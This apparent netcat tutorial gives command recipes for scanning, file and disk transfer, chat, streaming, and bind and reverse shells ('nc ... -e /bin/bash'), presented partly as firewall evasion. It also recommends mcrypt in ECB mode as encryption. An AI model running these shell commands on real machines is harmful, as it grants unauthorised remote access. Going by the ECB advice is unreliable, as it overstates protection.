Netcat is the Swiss Army knife of network tools: it can read and write data over TCP and UDP. By combining it with other tools through pipes and redirection, you can use it in many ways in your scripts. It's amazing what you can do with the netcat command.
What netcat does is create a connection between two computers and hand you the two data streams; what you do with them is limited only by your imagination. You can create a server, transfer files, chat with friends, stream media, or use it as a standalone client for other protocols.
Here are some examples of using netcat.
In the examples below, machine A is 172.31.100.7 and machine B is 172.31.100.23.
Examples of Linux netcat commands:
1. Port scan
Port scans are often used by system administrators and attackers alike to find open ports on a machine, which helps them identify weaknesses in the system.
$ nc -z -v -n 172.31.100.7 21-25
Netcat can run in TCP or UDP mode; TCP is the default, and the -u option switches to UDP.
The -z option tells netcat to use zero-I/O mode: it only reports whether the connection can be made and closes it immediately, without exchanging any data.
The -v option enables verbose output.
The -n option tells netcat not to use DNS to reverse-resolve the IP address.
This command prints all open ports between 21 and 25. A banner is a text message that a service sends you when you connect to it. Banner information is useful when you are trying to identify the type and version of a service, or a weakness in it. However, not all services send a banner.
Once you have found the open ports, you can easily connect to the service with netcat and grab its banner.
$ nc -v 172.31.100.7 21
This netcat command connects to open port 21 and prints the banner of the service running on that port.
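The -z probe and the banner grab above, re-implemented in Python as an added example (not from the article) for checking what a service on one of your own hosts exposes. It starts a throwaway loopback listener that sends a constructed FTP-style banner, so it runs offline; the address, port and banner text are assumptions.

```python
# Zero-I/O port check and banner read, modelled on `nc -z -v -n HOST PORT` and
# `nc -v HOST PORT` (added example, not from the article). A throwaway local
# listener with a constructed FTP-style banner stands in for the remote host.
import socket
import threading

CONSTRUCTED_BANNER = b"220 demo FTP service ready (constructed)\r\n"


def start_banner_server(banner: bytes) -> int:
    """Listen on 127.0.0.1, send `banner` to every client, then close it.
    Returns the port the OS assigned."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:              # listener closed
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:          # client already hung up (a -z probe does)
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def port_is_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """`nc -z`: complete the TCP handshake and close without sending data."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def grab_banner(host: str, port: int, timeout: float = 1.0) -> str:
    """`nc -v HOST PORT`, then read the first bytes the service volunteers.
    Returns "" when the service stays silent or refuses the connection."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            return s.recv(512).decode("utf-8", "replace").strip()
    except OSError:
        return ""


if __name__ == "__main__":
    port = start_banner_server(CONSTRUCTED_BANNER)
    print(f"port {port} open: {port_is_open('127.0.0.1', port)}")
    print(f"banner: {grab_banner('127.0.0.1', port)!r}")
```

A literal IP address is used throughout, which is what -n achieves in netcat: no reverse DNS lookup is attempted.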
2. Chat server
If you want to talk to your friends, there is plenty of software and many messaging services available. But if you do not have such luxuries, for example in a computer lab where all external connections are restricted, how do you chat all day with friends sitting in the next room? Don't despair: netcat lets you create a chat server on a predetermined port so they can reach you.
Server
$ nc -l 1567
This netcat command starts a TCP server on port 1567. Standard input is sent to that port and whatever arrives on it is written to standard output, so both sides of the conversation appear in this shell.
Client
$ nc 172.31.100.7 1567
Whatever you type on machine B will appear on machine A.
3. File transfer
Most of the time we transfer files over the network with some dedicated tool. There are many ways to do it, such as FTP, SCP, SMB and so on, but when you only need to transfer a file temporarily or once, it is hardly worth the time to install and configure software on your machine. Suppose you want to send a file file.txt from A to B. Either A or B can be the server or the client; below, A is the server and B is the client.
Server
$ nc -l 1567 < file.txt
Client
$ nc -n 172.31.100.7 1567 > file.txt
Here we create a server on A and redirect netcat's input from the file file.txt, so as soon as a connection to that port succeeds, netcat sends the file contents.
On the client we redirect the output to file.txt; when B connects to A, A sends the file contents and B saves them to file.txt.
The side that holds the file does not have to be the server; we can do it the other way round. In the following example the server is created on B and only redirects netcat's output to a file, while the client redirects the file into netcat's input.
Server (B)
$ nc -l 1567 > file.txt
Client (A)
$ nc 172.31.100.23 1567 < file.txt
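The file transfer above, re-implemented in Python as an added example (not from the article) to show what the two netcat processes actually do: one listens and streams its redirected input into the socket, the other connects and writes the socket to its redirected output. Netcat gives no integrity check, so both sides hash the bytes and the receiver compares digests; the payload and the loopback address are constructed for the demo.

```python
# Minimal netcat-style transfer over loopback (added example, not from the
# article): serve_once() plays `nc -l PORT < file.txt` and fetch() plays
# `nc -n HOST PORT > file.txt`. Netcat offers no integrity check, so both
# sides hash the bytes. The payload is constructed for the demo.
import hashlib
import socket
import threading

CONSTRUCTED_PAYLOAD = b"hello from host A\n" * 1000   # stands in for file.txt


def serve_once(data: bytes) -> int:
    """Listen on 127.0.0.1, send `data` to the first client, then exit.
    Returns the OS-assigned port (the article uses a fixed 1567)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def run():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(data)               # redirected stdin -> socket
            conn.shutdown(socket.SHUT_WR)    # EOF tells the client we're done
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1]


def fetch(host: str, port: int) -> bytes:
    """Connect and read the socket until EOF (socket -> redirected stdout)."""
    chunks = []
    with socket.create_connection((host, port), timeout=5) as s:
        while chunk := s.recv(65536):
            chunks.append(chunk)
    return b"".join(chunks)


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def transfer_and_verify(data: bytes) -> tuple:
    """Run sender and receiver on loopback; return (digests match, bytes received)."""
    port = serve_once(data)
    received = fetch("127.0.0.1", port)
    return sha256(received) == sha256(data), len(received)


if __name__ == "__main__":
    ok, n = transfer_and_verify(CONSTRUCTED_PAYLOAD)
    print(f"received {n} bytes, sha256 match: {ok}")
```

With real netcat the same check is `sha256sum file.txt` on both machines after the transfer; the EOF that ends the transfer corresponds to netcat exiting when its redirected input is exhausted.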
4. Directory transfer
Sending one file is simple, but sending several files or a whole directory is just as simple: use the archiving tool tar to pack them and send the archive.
If you want to transfer a directory over the network from A to B:
Server
$ tar -cvf - dir_name | nc -l 1567
Client
$ nc -n 172.31.100.7 1567 | tar -xvf -
Here on server A we create a tar archive and write it to standard output (the - after -f), then pipe it into netcat, which sends it over the network.
On the client we receive the archive through the netcat pipe and unpack it.
If you want to save bandwidth, we can compress the archive with bzip2 or another tool.
Server
$ tar -cvf - dir_name | bzip2 -z | nc -l 1567
Compress with bzip2.
Client
$ nc -n 172.31.100.7 1567 | bzip2 -d | tar -xvf -
Decompress with bzip2.
5. Encrypt the data you send over the network
If you are concerned about the security of the data you send over the network, you can encrypt it with a tool such as mcrypt before sending it.
Server (encrypts the file and listens)
$ mcrypt --flush --bare -F -q -m ecb < file.txt | nc -l 1567
Encrypt the data with mcrypt and serve it through netcat.
Client (connects and decrypts)
$ nc localhost 1567 | mcrypt --flush --bare -F -q -d -m ecb > file.txt
Decrypt the received data with mcrypt.
Both commands will prompt for a passphrase; make sure the same passphrase is used on both ends.
Here we used mcrypt, but any other encryption tool will do.
6. Streaming video
While this is not the best way to stream video, if there are no dedicated tools on the server, netcat still gives us a chance to do it.
Server
$ cat video.avi | nc -l 1567
Here we simply read from a video file and pipe it into netcat, which serves it to the client.
Client
$ nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 -
Here we read the data from the socket and pipe it into MPlayer.
7. Clone a device
If you have set up a Linux machine and need the same setup on other machines, you don't want to repeat the whole configuration. Instead of re-running the installation, just boot the other machine from some bootable disk and clone your machine.
Cloning a Linux PC is simple; assume your system is on the disk /dev/sda.
Server
$ dd if=/dev/sda | nc -l 1567
Client
$ nc -n 172.31.100.7 1567 | dd of=/dev/sda
dd reads raw data from the disk; we pipe its output through the netcat server to the other machine, where dd writes it to disk. This copies everything, including the partition table. If the disk is already partitioned and we only need to clone the root partition, change sda to sda1, sda2 and so on, according to where the root partition lives.
8. Open a shell
We have used remote shells with telnet and ssh, but if those are not installed and we lack permission to install them, we can also create a remote shell with netcat.
Suppose your netcat supports the -c or -e option (the traditional netcat).
Server
$ nc -l 1567 -e /bin/bash -i
Client
$ nc 172.31.100.7 1567
Here we create a netcat server and tell it to execute /bin/bash once a connection succeeds.
If netcat does not support -c or -e (OpenBSD netcat), we can still create a remote shell.
Server
$ mkfifo /tmp/tmp_fifo
$ cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo
Here we create a FIFO, then use a pipeline to feed the FIFO's contents to the shell; 2>&1 merges standard error into standard output, and the result is piped to netcat, which listens on port 1567. Finally, netcat's output is redirected into the FIFO.
Description:
- Input received from the network is written to the FIFO.
- cat reads the FIFO and sends its contents to sh.
- sh receives the input, runs it, and writes the result back to netcat.
- netcat sends the output to the client over the network.
The reason this works is that the commands in a pipeline run in parallel. A FIFO is used instead of a regular file because reading from a FIFO blocks until data arrives; with a regular file, cat would finish immediately after reading the empty file.
On the client, simply connect to the server:
Client
$ nc -n 172.31.100.7 1567
You will get a shell prompt on the client.
9. Reverse shell
A reverse shell is a shell opened from the client side. It is called a reverse shell because, unlike the usual arrangement, the server uses a service provided by the client.
Server
$ nc -l 1567
On the client, simply tell netcat to execute the shell once the connection is made.
Client
$ nc 172.31.100.7 1567 -e /bin/bash
Now, what is so special about the reverse shell?
Reverse shells are often used to get around firewall restrictions such as blocked inbound connections. For example, say my machine has the private IP address 172.31.100.7 and reaches the outside world through a proxy server. If I want a shell on this machine from an outside host such as 1.2.3.4, I would use a reverse shell for that purpose.
10. Specify the source port
Suppose your firewall filters all ports except port 25; you can specify the source port with the -p option.
Server
$ nc -l 1567
Client
$ nc 172.31.100.7 1567 -p 25
Using a port below 1024 requires root privileges.
This command makes the client use port 25 as the source port of the connection; otherwise a random port would be used.
11. Specify the source address
Suppose your machine has multiple addresses and you want to specify explicitly which one is used for outgoing traffic. We can use netcat's -s option to specify the IP address.
Server
$ nc -u -l 1567 < file.txt
Client
$ nc -u 172.31.100.7 1567 -s 172.31.100.5 > file.txt
This command binds the client to the address 172.31.100.5.
These are just some examples of using netcat.
Other uses include:
- using the -t option to impersonate a Telnet client,
- acting as an HTTP client to download files,
- connecting to a mail server and checking messages over SMTP,
- capturing the screen with FFmpeg and sharing it as a stream, and much more.
Simply put, as long as you understand the protocol, you can use netcat as a network communication medium to implement all kinds of clients.